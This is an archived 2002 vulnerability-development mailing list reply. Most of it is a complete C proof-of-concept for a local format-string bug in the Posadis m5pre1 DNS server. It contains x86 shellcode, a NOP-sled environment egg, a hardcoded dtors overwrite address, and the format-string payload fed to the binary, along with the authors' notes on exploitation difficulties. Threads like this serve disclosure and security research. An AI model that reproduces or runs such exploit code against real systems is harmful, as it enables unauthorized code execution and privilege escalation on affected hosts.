Vulnerability Development mailing list archives
Re: bufferoverflow posadis m5pre - ( POC number 2 )
From: KF <dotslash () snosoft com>
Date: Wed, 17 Apr 2002 13:58:57 -0400
We have been working on this issue for a while but have yet to exploit it remotely. The posadis binary is not suid root by default if I remember correctly... from my research on the issue I thought that it may be possible to exploit this issue using a feature called "Hint domains" but I have not been able to test this theory. Here is what we came up with for the exploitation of the local binary ... I was holding on to it until I worked out the remote exploitation but there is no point now. =]
-KF eSDee wrote:
Netric Security Team - http://www.netric.org by eSDee Posadis m5pre2 Type: Stackoverflow Priority: 2
...
/* * Posadis m5pre1 DNS local format string exploit. * * The exploitation research was provided by KF / Snosoft (http://www.snosoft.com) * Original hole was found by KKR of (http://dekode.org) * Exploit coded up by The Itch / Promisc (http://www.promisc.org) * * This exploit was developed on the Snosoft vulnerability research machines * * - The Itch * - itchie () promisc org * * - Technical Difficulties - * * 1). Posadis messes with the bytes-written-so-far part, therefor an exact * address cannot be written, it will be off around 20 bytes from the * address you specify. * 2). STRANGELY, execve("/bin/sh", "sh", 0); will fail! (no error or anything, * i checked with gdb, i get a SIGTRAP as it supposes but the code will not * be executed. A shellcode that does execve("/tmp/p00p", "p00p", 0) did * work. p00p is just a simple bash script. */ #include <stdio.h> #include <stdlib.h> #define NOP 0x90 #define EGGSIZE 2048 /* execve /tmp/p00p (courtesy of zillion), see /tmp/p00p */ char shellcode[] = "\xeb\x21\x5e\x31\xc0\x88\x46\x07\x88\x46\x11\x89\x76\x12\x8d" "\x5e\x08\x89\x5e\x16\x89\x46\x1a\xb0\x0b\x89\xf3\x8d\x4e\x12" "\x8d\x56\x1a\xcd\x80\xe8\xda\xff\xff\xff\x2f\x62\x69\x6e\x2f" "\x73\x68\x38\x2f\x74\x6d\x70\x2f\x70\x30\x30\x70\x32\x33\x34" "\x35\x36\x37\x38\x39\x61\x62\x63\x64\x65"; int main(int argc, char *argv[]) { char *fmt; char egg[EGGSIZE]; unsigned long smashaddr = 0x08063d14; /* overwrite (dtor section) */ char splitaddr0, splitaddr1, splitaddr2, splitaddr3; splitaddr0 = (smashaddr & 0xff000000) >> 24; splitaddr1 = (smashaddr & 0x00ff0000) >> 16; splitaddr2 = (smashaddr & 0x0000ff00) >> 8; splitaddr3 = (smashaddr & 0x000000ff); if(!(fmt = malloc(256))) {printf("malloc()\n"); exit(-1);} memset(fmt, 0x00, 256); memset(egg, 0x00, EGGSIZE); memset (egg, NOP, EGGSIZE - strlen (shellcode)); memcpy (egg + EGGSIZE - strlen (shellcode) - 1, shellcode, strlen (shellcode)); sprintf(fmt,"AAA%c%c%c%c%c%c%c%c%%.49095u%%21$hn%%.15116u%%20$hn", splitaddr3, splitaddr2, splitaddr1, splitaddr0, splitaddr3 + 2, splitaddr2, splitaddr1, splitaddr0); egg[EGGSIZE -1] = '\0'; memcpy(egg, "EGG=", 4); putenv(egg); execl("/home/posadis-m5pre1/src/posadis", "posadis", fmt, NULL); return 0; }
Current thread:
- bufferoverflow posadis m5pre2 eSDee (Apr 17)
- Re: bufferoverflow posadis m5pre - ( POC number 2 ) KF (Apr 17)